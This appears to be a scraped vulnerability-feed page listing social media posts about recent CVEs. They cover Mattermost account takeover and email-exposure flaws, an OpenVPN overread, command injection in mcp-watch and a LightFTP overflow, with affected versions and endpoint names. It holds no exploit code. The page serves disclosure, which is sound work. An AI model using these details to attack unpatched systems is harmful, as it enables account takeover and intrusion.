Overview
- Avast
- Antivirus
Description
Statistics
- 1 Post
- 7 Interactions
Overview
- Mattermost
- Mattermost
Description
Statistics
- 1 Post
- 4 Interactions
Fediverse
sev:CRIT account takeover in Mattermost.
Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to to verify that the token used during the code exchange originates from the same authentication flow, which allows an authenticated user to perform account takeover via a specially crafted email address used when switching authentication methods and sending a request to the /users/login/sso/code-exchange endpoint. The vulnerability requires ExperimentalEnableAuthenticationTransfer to be enabled (default: enabled) and RequireEmailVerification to be disabled (default: disabled).
Overview
- Ruijie Networks Co., Ltd.
- RG-UAC
Description
Statistics
- 1 Post
- 1 Interaction
Overview
Description
Statistics
- 1 Post
- 5 Interactions
Fediverse
Buffer overread in OpenVPN. See what happens when you enable IPv6?
https://community.openvpn.net/Security%20Announcements/CVE-2025-12106
Overview
- Avast
- Antivirus
Description
Statistics
- 1 Post
- 5 Interactions
Overview
- Mattermost
- Mattermost
Description
Statistics
- 1 Post
- 2 Interactions
Fediverse
Also:
Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to sanitize team email addresses to be visible only to Team Admins, which allows any authenticated user to view team email addresses via the GET /api/v4/channels/{channel_id}/common_teams endpoint
Overview
- Mattermost
- Mattermost
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
And:
Mattermost versions 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12, 11.0.x <= 11.0.3 fail to properly validate OAuth state tokens during OpenID Connect authentication which allows an authenticated attacker with team creation or admin privileges to take over any user account via manipulation of authentication data during the OAuth completion flow
Overview
- kapilduraphe
- mcp-watch
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
🔴 CVE-2025-66401 (CRITICAL, CVSS 9.8): kapilduraphe mcp-watch ≤0.1.2 is vulnerable to OS command injection via unsanitized githubUrl in cloneRepo. Attackers can execute arbitrary commands remotely. Audit, isolate, and monitor now! https://radar.offseq.com/threat/cve-2025-66401-cwe-78-improper-neutralization-of-s-6ace6b6d #OffSeq #Vulnerability #CyberSec
Overview
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
BoF in LightFTP.
https://shimo.im/docs/9030JMJpv4IM4Nkw/read
A buffer overflow in the g_cfg.MaxUsers component of LightFTP v2.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.